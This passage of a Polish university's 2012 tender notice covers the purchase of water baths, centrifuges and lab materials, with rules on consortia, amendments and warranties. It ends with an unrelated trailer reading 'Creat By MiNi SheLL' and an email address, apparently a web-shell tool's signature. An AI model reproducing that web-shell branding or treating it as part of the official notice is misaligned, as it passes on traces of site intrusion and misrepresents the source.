2.2.Zgodnie z art. 26 ust. 2b ustawy Pzp wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne (w oryginale) zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają wspólnie.

Treść zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy. A w sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.

W przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunku udziału w postępowaniu dotyczącego posiadania wiedzy i doświadczenia powołuje się na doświadczenie podmiotu trzeciego    i  przedstawia  posiadane  przez  ten  podmiot  referencje,  wymagany  jest  udział   tego   podmiotu   w realizacji zamówienia. W takim przypadku w ofercie należy przedstawić (w oryginale) oświadczenie lub inny dokument tego podmiotu z którego wynika, że będzie brał on udział w realizacji zamówienia. Dokumenty te Wykonawcy składający ofertę wspólnie składają wspólnie.

W przypadku, gdy Wykonawca w ofercie powołał się na doświadczenie podmiotu trzeciego przy wykazaniu spełnienia warunku doświadczenia i podmiot ten uczestniczy w realizacji zamówienia, np. jako podwykonawca, niedopuszczalna jest zmiana tego podmiotu na etapie realizacji zamówienia.  

2.3.Wypełniony i podpisany formularz ofertowy wg załącznika nr 1 do SIWZ.

2.4.	Ewentualne pełnomocnictwo.

2.5.	Wypełniony i podpisany arkusz  kalkulacyjny - załącznik nr 3c do SIWZ.

2.6.Wymagania związane ze złożeniem oferty wspólnej:
W przypadku grupy przedsiębiorców działających w formie spółki cywilnej lub w formie konsorcjum (składających ofertę wspólnie) należy przedstawić w ofercie pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców/wspólników w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być wystawione w formie, o której mowa w rozdziale V pkt. 5 SIWZ.

W złożonej ofercie wspólnej dla Części nr 3 przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w rozdziale V SIWZ dla Części nr 3 punkt 9.2 i 9.3. Dokumenty określone 
w rozdziale V SIWZ  dla Części nr 3 w punktach 9.1, 9.4, 9.5, 9.6 poszczególne podmioty składają wspólnie, tj. warunki w nich określone zostaną spełnione, gdy podmioty składające wspólną ofertę spełnią je łącznie. 

Oświadczenie Wykonawcy (zał. nr 2 do SIWZ) musi być podpisane przez wszystkich członków konsorcjum, wspólników spółki cywilnej lub osobę wskazaną w pełnomocnictwie. Formularz ofertowy (zał. nr 1 do SIWZ) musi być wypełniony 
i podpisany przez osobę upoważnioną do reprezentowania Wykonawców/wspólników.
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. 

3. DLA WSZYSTKICH CZĘŚCI
3.1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu (dotyczy Części nr 1, 2, 3): 
a) aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, 
w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy.

składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:

a) nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Dokument, o którym mowa w pkt. 3.1 lit. [a] powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania  osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt. 3.1 lit. [a]  zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Pozostałe dokumenty, o których mowa w rozdziale V pkt. 9 SIWZ dla wszystkich Części Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej.

4.Jeżeli Wykonawca prowadzi działalność gospodarczą, która wymaga zgłoszenia do ewidencji działalności gospodarczej, Zamawiający przed podpisaniem umowy wymaga przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej lub potwierdzenia rejestracji w CEIDG tj. Centralnej Ewidencji i Informacji o Działalności Gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>CZĘŚĆ NR 1, CZĘŚĆ NR 2, CZEŚĆ NR 3
1. Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza wprowadzenie istotnych zmian do umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:

I) dopuszcza się przedłużenie terminu realizacji zamówienia w następujących sytuacjach:
      a) z przyczyn nie leżących po stronie Wykonawcy oraz w przypadku wystąpienia sił wyższych,
      b) z przyczyn leżących po stronie Zamawiającego,
 II) inne zmiany:
a)	jeżeli  nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ  na realizację przedmiotu zamówienia, 
b)	możliwa jest zmiana umowy w zakresie podwykonawstwa na etapie realizacji dostawy, za uprzednią zgodą zamawiającego, o ile nie sprzeciwia się to postanowieniom SIWZ, tj.:
- powierzenie Podwykonawcom innego zakresu dostawy niż wskazany w ofercie Wykonawcy,
- zmiana podwykonawcy na etapie realizacji zamówienia, 
- wprowadzenie nowego Podwykonawcy, również w przypadku gdy Wykonawca wskazał w ofercie, że dostawę przedmiotu zamówienia  wykona samodzielnie, 
c)	zmian przepisów prawa podatkowego, 
d)	zmian dotyczących powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 
e)	W przypadku ustawowej zmiany stawki podatku VAT wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej na dzień wystawienia faktury (powstania obowiązku podatkowego). 
W takiej sytuacji nie jest wymagane sporządzenie aneksu do umowy,
f)	zmian osób reprezentujących Wykonawcę i Zamawiającego z przyczyn losowych

 III) warunki dokonywania zmian:
           a) inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego,
           b) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
           c) forma pisemna pod rygorem nieważności w formie aneksu do umowy.

2. Zmiana umowy dokonana z naruszeniem powyższych zasad podlega unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl (zakładka: przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. C.K. Norwida 25/27, 50-375 Wrocław, pokój 32, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 10:30, miejsce: Ofertę należy złożyć  w Sekretariacie Kanclerza Uniwersytetu Przyrodniczego we Wrocławiu, ul. C.K. Norwida 25/27, 50-375 Wrocław, pokój 142, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Niniejsze postępowania jest realizowane na potrzeby projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.

2. Zamawiający nie  przewiduje udzielenia zamówień uzupełniających.

3. Zamawiający nie dopuszcza składania ofert wariantowych. 

4 . Zamawiający nie przewiduje:
- zawarcia umowy ramowej;
- aukcji elektronicznej;
- ustanowienia dynamicznego systemu zakupów;
- udzielania zaliczek na poczet wykonania zamówienia.
5. Dokumenty, o których mowa w Rozdziale V pkt 9 SIWZ  wymienione w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2009 roku, w sprawie rodzajów dokumentów, jakie  może żądać Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane,  są składane w formie oryginałów lub kopii poświadczonej za zgodność z oryginałem przez  Wykonawcę. Pozostałe dokumenty, o których mowa w Rozdziale V pkt 9 SIWZ należy złożyć w formie oryginału.
6.W zakresie nieuregulowanym Specyfikacją Istotnych Warunków Zamówienia  mają zastosowanie przepisy rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form w jakich dokumenty te mogą być składane.
7. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w §1 ust 2 i 3 Rozporządzenia Prezesa Rady Ministrów w  sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów muszą być poświadczone za zgodność z oryginałem przez wykonawcę lub te podmioty.
8. Postępowanie prowadzone jest zgodnie z Ustawą z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759, Nr 161, poz. 1078 i Nr 182, poz. 1228 oraz z 2011 r. Nr 5, poz. 13 i Nr 28, poz. 143 z późniejszymi zmianami) zwaną dalej ustawą Pzp oraz wydanymi na podstawie tej ustawy rozporządzeniami wykonawczymi.

9. Do czynności podejmowanych przez Zamawiającego i Wykonawców, w sprawach nie uregulowanych ustawą Pzp, stosować się będzie przepisy ustawy z dnia 23 kwietnia 1964 - Kodeks cywilny..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.

Część nr 1: Dostawa  łaźni wodnych dwumiejscowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wymagania Zamawiającego dotyczące przedmiotu zamówienia:

a)	Przedmiotem zamówienia jest: dostawa  łaźni wodnych dwumiejscowych.

b)	Miejscem dostawy jest: Zakład Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

c)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3a do SIWZ.

d)	Szczegółowy opis realizacji przedmiotu zamówienia stanowi załącznik nr 4a do SIWZ (projekt umowy)

e)	 Oferowany sprzęt musi być fabrycznie nowy, aktualnie produkowany i dostępny na rynku.

f)	  Wykonawca będzie zobowiązany dołączyć do każdego dostarczonego sprzętu instrukcję obsługi w języku polskim oraz karty gwarancyjne zgodnie z wymogami SIWZ.

g)	 Wykonawca będzie zobowiązany do dołączenia Deklaracji Zgodności (CE) przy dostawie sprzętu.

h)	  W ramach ceny ofertowej Wykonawca będzie zobowiązany do dostawy, instalacji, uruchomienia sprzętu 
w siedzibie Zamawiającego oraz przeszkolenia pracowników Zamawiającego w zakresie uruchomienia i obsługi sprzętu.



2. Wymagania Zamawiającego dotyczące warunków gwarancji:

a) wymagana przez Zamawiającego długość okresu gwarancji:  24 miesięcy.

Okres gwarancji liczy się od dnia zainstalowania dostarczonego sprzętu i bezusterkowego przekazania przedmiotu zamówienia, przez co rozumie się dzień podpisania protokołu  jego odbioru technicznego,

b) Wykonawca zapewni serwis gwarancyjny przez okres gwarancji,

c) czas naprawy - do 14 dni kalendarzowych  licząc od dnia zgłoszenia,

d) w przypadku dwóch napraw tego samego modułu lub usterek tego samego typu w okresie gwarancji Wykonawca będzie zobowiązany dokonać wymiany sprzętu na nowy, liczba ta nie obejmuje napraw wynikających z niewłaściwej eksploatacji oraz działania sił wyższych,

e) transport sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy,

f) każda naprawa gwarancyjna przedłuża gwarancję o czas przerwy w eksploatacji sprzętu.

3. Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Zakładu Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

4. Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

5. Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.94.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.


Część nr 2: Dostawa wirówek stołowych z wymiennymi wirnikami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Wymagania Zamawiającego dotyczące przedmiotu zamówienia:


a)	Przedmiotem zamówienia jest: dostawa wirówek stołowych z wymiennymi wirnikami.

Miejscem dostawy jest: Zakład Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław

b)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3b do SIWZ.

c)	Szczegółowy opis realizacji przedmiotu zamówienia znajduje się w załączniku nr 4b do SIWZ (projekt umowy)

d)	 Oferowany sprzęt musi być fabrycznie nowy, aktualnie produkowany i dostępny na rynku.

e)	 Wykonawca będzie zobowiązany dołączyć do każdego dostarczonego sprzętu instrukcję obsługi w języku polskim oraz karty gwarancyjne zgodnie z wymogami SIWZ.

f)	 Wykonawca będzie zobowiązany do dołączenia Deklaracji Zgodności (CE) przy dostawie sprzętu.

g)	  W ramach ceny ofertowej Wykonawca będzie zobowiązany do dostawy, instalacji, uruchomienia sprzętu 
w siedzibie Zamawiającego oraz przeszkolenia pracowników Zamawiającego w zakresie uruchomienia i obsługi sprzętu.


2.	Wymagania Zamawiającego dotyczące warunków gwarancji:

a) wymagana przez Zamawiającego długość okresu gwarancji:  24 miesięcy.

Okres gwarancji liczy się od dnia zainstalowania dostarczonego sprzętu i bezusterkowego przekazania przedmiotu zamówienia, przez co rozumie się dzień podpisania protokołu  jego odbioru technicznego,

b) Wykonawca zapewni serwis gwarancyjny przez okres gwarancji,

c) czas naprawy - do 14 dni kalendarzowych  licząc od dnia zgłoszenia,

d) w przypadku dwóch napraw tego samego modułu lub usterek tego samego typu w okresie gwarancji Wykonawca będzie zobowiązany dokonać wymiany sprzętu na nowy, liczba ta nie obejmuje napraw wynikających z niewłaściwej eksploatacji oraz działania sił wyższych,

e) transport sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy,

f) każda naprawa gwarancyjna przedłuża gwarancję o czas przerwy w eksploatacji sprzętu.

3. Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Zakładu Mikrobiologii Rolniczej, Plac Grunwaldzki 24A, 50-363 Wrocław.

4. Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

5. Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.93.11.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa drobnego sprzętu laboratoryjnego, materiałów i surowców dla projektu: Geokompozyty sorbujące wodę-innowacyjne technologie wspomagające wegetację roślin współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013, Działanie 1.3, Poddziałanie 1.3.1, nr umowy UDA-POIG. 01.03.01-00-181/09-06.

Część nr 3. Dostawa  materiałów i surowców laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wymagania Zamawiającego dotyczące przedmiotu zamówienia:

a)	Przedmiotem zamówienia jest: Dostawa  materiałów i surowców laboratoryjnych.
Miejscem dostawy są: Katedry Uniwersytetu Przyrodniczego mieszczące się przy Placu Grunwaldzkim 24A, 50-363 Wrocław.

b)	 Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 3c do SIWZ.
c)	Szczegółowy opis realizacji przedmiotu umowy znajduje się w załączniku nr 4c do SIWZ (projekt umowy)

d)	 Oferowany asortyment musi być fabrycznie nowy, w oryginalnych opakowaniach producenta.

e)	Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt bezpośrednio do siedzib jednostek organizacyjnych Uniwersytetu Przyrodniczego we Wrocławiu, na podstawie złożonego formalnie zamówienia przez pracowników Zamawiającego na piśmie, faxem lub mailem.

f)	Wykonawca gwarantuje właściwą konstrukcję, jakość użytych materiałów, właściwe wykonanie i zgodność z normami, jak również kompletność przedmiotu umowy, zgodnie z opisem przedmiotu zamówienia, stanowiącym załączniki nr 3c SIWZ,

g)	Wykonawca udzieli Zamawiającemu gwarancji na okres 12 miesięcy.

h)	Okres gwarancji liczy się od dnia przekazania przedmiotu zamówienia, tj. od dnia podpisania protokołu  jego odbioru.

i)	Odbiór danej partii asortymentu zostanie przeprowadzony w dniu dostawy przedmiotu zamówienia. 

j)	Protokół odbioru zostanie sporządzony w 2 egzemplarzach, po 1 egzemplarzu dla każdej ze stron i podpisany przez obie strony. Za odbiór strony uznają podpisanie przez uprawnionych przedstawicieli stron protokołu odbioru bez  uwag.

k)	W przypadku stwierdzenia podczas odbioru technicznego usterek lub odstępstw od wymagań określonych 
w SIWZ w tym załączniku nr 3c do SIWZ (załącznik nr 2 do umowy), Wykonawca zobowiązuje się do niezwłocznego ich usunięcia lub dokonania zmian zgodnie z opisem. W takim przypadku zostanie sporządzony protokół o stwierdzonych usterkach lub odstępstwach w 2 egzemplarzach, po 1 dla każdej ze stron i podpisany przez obie strony. W protokole tym strony ustalają dodatkowy termin odbioru materiału. Ustęp ten nie wyłącza postanowień  dotyczących kar umownych i odstąpienia od umowy. 

l)	Jeżeli w okresie gwarancji ujawnią się lub zostaną wykryte wady przedmiotu zamówienia, Wykonawca zobowiązany jest do ich nieodpłatnej naprawy lub wymiany na wolne od wad, czas naprawy zgłoszonej usterki - do 7 dni od daty doręczenia reklamacji Wykonawcy w formie pisemnej, za pośrednictwem faksu lub pocztą elektroniczną. W szczególnych przypadkach terminy te mogą za zgodą Zamawiającego ulec przedłużeniu.

m)	Odbiór przedmiotu zamówienia dokona minimum 1 przedstawiciel Zamawiającego w obecności, co najmniej 1 przedstawiciela Wykonawcy. 

n)	Wykonawca odpowiada za dostarczony przez siebie przedmiot umowy do czasu odbioru przez Zamawiającego.

o)	Wykonawca zobowiązany jest dostarczyć wraz z dostawą przedmiotu zamówienia następującą dokumentację w języku polskim: kartę gwarancyjną, instrukcje obsługi dla użytkowników.

2. Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

3. Wykonawca zobowiązuje się dostarczyć zamówiony towar własnym transportem i na własny koszt. Dostawa będzie realizowana bezpośrednio do siedziby Zamawiającego tj. do Katedr Uniwersytetu Przyrodniczego mieszczących się przy Placu Grunwaldzkim 24A, 50-363 Wrocław.

4. Zamawiający dopuszcza możliwość niewykorzystania całości ilości poszczególnych asortymentów podanych 
w arkuszu kalkulacyjnym, stanowiącym załącznik nr 3c do SIWZ. W przypadku nie wyczerpania przez Zamawiającego, w okresie trwania umowy asortymentu i ilości produktów, wykonawca nie będzie rościć żadnych żądań wobec Zamawiającego

5. Zakres przedmiotu zamówienia winien być zrealizowany zgodnie z obowiązującymi  normami i przepisami.

6. Zamawiający zgodnie z art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie części zamówienia, których wykonanie powierzy podwykonawcom.
7.Dopuszcza się zakończenie realizacji umowy w terminie wcześniejszym w przypadku zakupienia przez Zamawiającego całego asortymentu będącego przedmiotem zamówienia lub wcześniejszego wyczerpania wartości umowy przed upływem 90 dni od daty zawarcia umowy. (Taka zmiana terminu realizacji umowy nie wymaga zawarcia aneksu).

8. Termin dostaw zamawianej partii asortymentu: do 21 dni kalendarzowych licząc od daty złożenia zamówienia przez Zamawiającego pisemnie, faksem lub pocztą internetową u Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com